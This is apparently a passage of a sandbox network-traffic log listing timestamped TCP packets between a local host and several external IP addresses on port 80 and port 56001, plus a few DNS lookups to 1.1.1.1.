Sep 1, 2024 18:28:27.559474945 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.559498072 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559505939 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559514046 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559547901 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.559649944 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559705019 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.559797049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.559868097 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.559962988 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.560008049 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.560019970 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.560050011 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.564187050 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564234972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.564256907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564310074 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.564332008 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564341068 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564368963 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:27.564479113 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564523935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564532995 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564564943 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564672947 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564826965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564836025 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564843893 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564934969 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564944029 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.564996958 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565005064 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565013885 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565202951 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565212965 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565227985 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565237045 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565284967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565295935 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565341949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565351009 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565378904 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565437078 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565445900 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565454006 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565658092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565666914 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565675974 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565685034 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565695047 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.565704107 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.566047907 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.566056967 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.566065073 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.566072941 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569076061 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569084883 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569098949 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569109917 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569210052 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569219112 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569338083 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569346905 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569382906 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569391966 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569401026 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569520950 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569530964 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569539070 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569547892 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569555044 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:27.569562912 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:28.086023092 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:28.086081982 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:28.528206110 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:28.533444881 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:28.773201942 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:28.773288012 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:29.417886972 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:29.422975063 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:29.655884027 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:29.655929089 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:34.717942953 CEST	80	56177	91.202.233.158	192.168.2.4
Sep 1, 2024 18:28:34.717995882 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:28:37.694133997 CEST	56177	80	192.168.2.4	91.202.233.158
Sep 1, 2024 18:29:17.815129995 CEST	56178	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:17.870297909 CEST	80	56178	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:17.870399952 CEST	56178	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:17.870544910 CEST	56178	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:17.870564938 CEST	56178	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:17.875536919 CEST	80	56178	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:17.875546932 CEST	80	56178	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:19.119992018 CEST	80	56178	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:19.120609045 CEST	80	56178	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:19.120665073 CEST	56178	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:19.120704889 CEST	56178	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:19.125696898 CEST	80	56178	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:24.842474937 CEST	56179	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:24.847371101 CEST	80	56179	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:24.847459078 CEST	56179	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:24.847635031 CEST	56179	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:24.847660065 CEST	56179	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:24.852811098 CEST	80	56179	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:24.853264093 CEST	80	56179	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:24.900655985 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:24.905478954 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:24.905555010 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:24.907288074 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:24.912305117 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:24.929403067 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:24.934272051 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:25.580200911 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:25.580224991 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:25.580271959 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:25.587658882 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:25.592711926 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:25.783195972 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:25.928803921 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:26.361638069 CEST	80	56179	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:26.363090992 CEST	80	56179	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:26.363147974 CEST	56179	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:26.363188028 CEST	56179	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:26.370475054 CEST	80	56179	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:27.247976065 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:27.253190041 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:27.253261089 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:27.258764029 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:32.398076057 CEST	56181	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:32.403115988 CEST	80	56181	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:32.403209925 CEST	56181	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:32.403373957 CEST	56181	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:32.403383970 CEST	56181	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:32.408305883 CEST	80	56181	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:32.408477068 CEST	80	56181	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:33.678709030 CEST	80	56181	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:33.679150105 CEST	80	56181	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:33.679220915 CEST	56181	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:33.679271936 CEST	56181	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:33.684231997 CEST	80	56181	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:39.531316042 CEST	56182	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:39.543366909 CEST	80	56182	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:39.543445110 CEST	56182	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:39.543625116 CEST	56182	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:39.543652058 CEST	56182	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:39.553755999 CEST	80	56182	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:39.554536104 CEST	80	56182	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:40.838824034 CEST	80	56182	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:40.841645956 CEST	80	56182	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:40.841730118 CEST	56182	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:40.841784000 CEST	56182	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:40.850347042 CEST	80	56182	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:46.011605978 CEST	56183	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:46.017322063 CEST	80	56183	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:46.017380953 CEST	56183	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:46.017560005 CEST	56183	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:46.017574072 CEST	56183	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:46.024364948 CEST	80	56183	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:46.024521112 CEST	80	56183	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:47.285330057 CEST	80	56183	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:47.285897017 CEST	80	56183	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:47.286089897 CEST	56183	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:47.286175013 CEST	56183	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:29:47.300638914 CEST	80	56183	191.191.224.16	192.168.2.4
Sep 1, 2024 18:29:54.406908989 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:54.412184000 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:54.412235022 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:54.417100906 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:54.747648954 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:54.902584076 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:54.902684927 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:54.914077044 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:54.925868034 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:54.925924063 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:29:54.932264090 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:29:56.690876961 CEST	56184	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:29:56.699903011 CEST	80	56184	92.36.226.66	192.168.2.4
Sep 1, 2024 18:29:56.699987888 CEST	56184	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:29:56.700198889 CEST	56184	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:29:56.700222015 CEST	56184	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:29:56.709441900 CEST	80	56184	92.36.226.66	192.168.2.4
Sep 1, 2024 18:29:56.712795973 CEST	80	56184	92.36.226.66	192.168.2.4
Sep 1, 2024 18:29:57.565114021 CEST	80	56184	92.36.226.66	192.168.2.4
Sep 1, 2024 18:29:57.566184998 CEST	80	56184	92.36.226.66	192.168.2.4
Sep 1, 2024 18:29:57.566253901 CEST	56184	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:29:57.566301107 CEST	56184	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:29:57.571377039 CEST	80	56184	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:03.568368912 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:03.719285965 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:03.719386101 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:04.360021114 CEST	56185	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:04.366822958 CEST	80	56185	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:04.366889000 CEST	56185	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:04.367039919 CEST	56185	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:04.367050886 CEST	56185	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:04.374066114 CEST	80	56185	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:04.374145985 CEST	80	56185	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:05.184688091 CEST	80	56185	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:05.185250044 CEST	80	56185	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:05.185420036 CEST	56185	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:05.185420990 CEST	56185	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:05.190475941 CEST	80	56185	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:11.038404942 CEST	56186	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:11.043572903 CEST	80	56186	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:11.043648958 CEST	56186	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:11.043839931 CEST	56186	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:11.043890953 CEST	56186	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:11.049360037 CEST	80	56186	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:11.049385071 CEST	80	56186	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:11.872128963 CEST	80	56186	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:11.872689962 CEST	80	56186	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:11.872786045 CEST	56186	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:11.872813940 CEST	56186	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:11.877726078 CEST	80	56186	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:17.357604027 CEST	56187	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:17.371012926 CEST	80	56187	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:17.371208906 CEST	56187	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:17.371278048 CEST	56187	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:17.371304989 CEST	56187	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:17.378989935 CEST	80	56187	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:17.381015062 CEST	80	56187	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:18.221718073 CEST	80	56187	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:18.223125935 CEST	80	56187	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:18.223191023 CEST	56187	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:18.223237038 CEST	56187	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:18.228045940 CEST	80	56187	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:22.472306967 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:22.477485895 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:22.477555990 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:22.482712984 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:22.817078114 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:22.970593929 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:22.970782042 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:22.975939989 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:22.980890036 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:22.980978966 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:22.986288071 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:23.946118116 CEST	56188	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:23.951203108 CEST	80	56188	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:23.951289892 CEST	56188	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:23.951495886 CEST	56188	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:23.951543093 CEST	56188	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:23.956989050 CEST	80	56188	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:23.957056999 CEST	80	56188	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:25.040429115 CEST	80	56188	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:25.040990114 CEST	80	56188	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:25.041054010 CEST	56188	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:25.041081905 CEST	56188	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:25.046000004 CEST	80	56188	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:29.729938984 CEST	56189	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:29.734951019 CEST	80	56189	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:29.735044003 CEST	56189	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:29.735198975 CEST	56189	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:29.735235929 CEST	56189	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:29.740058899 CEST	80	56189	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:29.740356922 CEST	80	56189	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:30.577759981 CEST	80	56189	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:30.577788115 CEST	80	56189	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:30.577827930 CEST	56189	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:30.577992916 CEST	56189	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:30.584084988 CEST	80	56189	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:35.548408031 CEST	56190	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:35.553483009 CEST	80	56190	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:35.553679943 CEST	56190	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:35.553705931 CEST	56190	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:35.553705931 CEST	56190	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:35.560925007 CEST	80	56190	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:35.560935020 CEST	80	56190	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:36.395734072 CEST	80	56190	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:36.396121025 CEST	80	56190	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:36.396183014 CEST	56190	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:36.396224022 CEST	56190	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:36.401165009 CEST	80	56190	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:41.576045036 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:41.719398975 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:41.719623089 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:42.633126020 CEST	56191	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:42.638148069 CEST	80	56191	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:42.638232946 CEST	56191	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:42.638418913 CEST	56191	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:42.638474941 CEST	56191	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:42.643502951 CEST	80	56191	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:42.643580914 CEST	80	56191	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:43.498720884 CEST	80	56191	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:43.499175072 CEST	80	56191	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:43.499336004 CEST	56191	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:43.499336004 CEST	56191	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:43.504318953 CEST	80	56191	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:48.018851042 CEST	56192	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:48.023802042 CEST	80	56192	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:48.023895025 CEST	56192	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:48.024061918 CEST	56192	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:48.024102926 CEST	56192	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:48.029131889 CEST	80	56192	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:48.029247046 CEST	80	56192	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:48.861845970 CEST	80	56192	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:48.876777887 CEST	80	56192	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:48.876869917 CEST	56192	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:48.876996040 CEST	56192	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:48.881786108 CEST	80	56192	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:50.488959074 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:50.496788025 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:50.496936083 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:50.503045082 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:50.836761951 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:50.929032087 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:50.986562967 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:50.989090919 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:50.994168043 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:50.994246006 CEST	56180	56001	192.168.2.4	45.202.35.38
Sep 1, 2024 18:30:50.999443054 CEST	56001	56180	45.202.35.38	192.168.2.4
Sep 1, 2024 18:30:54.463195086 CEST	56193	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:54.468662024 CEST	80	56193	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:54.468734980 CEST	56193	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:54.468869925 CEST	56193	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:54.468895912 CEST	56193	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:54.474309921 CEST	80	56193	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:54.474319935 CEST	80	56193	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:55.292237997 CEST	80	56193	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:55.293334007 CEST	80	56193	92.36.226.66	192.168.2.4
Sep 1, 2024 18:30:55.293384075 CEST	56193	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:55.293405056 CEST	56193	80	192.168.2.4	92.36.226.66
Sep 1, 2024 18:30:55.298458099 CEST	80	56193	92.36.226.66	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 18:27:15.810333014 CEST	57576	53	192.168.2.4	1.1.1.1
Sep 1, 2024 18:27:16.804039955 CEST	57576	53	192.168.2.4	1.1.1.1
Sep 1, 2024 18:27:16.810821056 CEST	53	57576	1.1.1.1	192.168.2.4
Sep 1, 2024 18:27:20.020844936 CEST	53	57576	1.1.1.1	192.168.2.4
Sep 1, 2024 18:27:51.347188950 CEST	49942	53	192.168.2.4	1.1.1.1
Sep 1, 2024 18:27:51.356708050 CEST	53	49942	1.1.1.1	192.168.2.4
Sep 1, 2024 18:27:57.972275019 CEST	62835	53	192.168.2.4	1.1.1.1
Sep 1, 2024 18:27:58.022819042 CEST	53	62835	1.1.1.1	192.168.2.4
Sep 1, 2024 18:29:53.483686924 CEST	64030	53	192.168.2.4	1.1.1.1
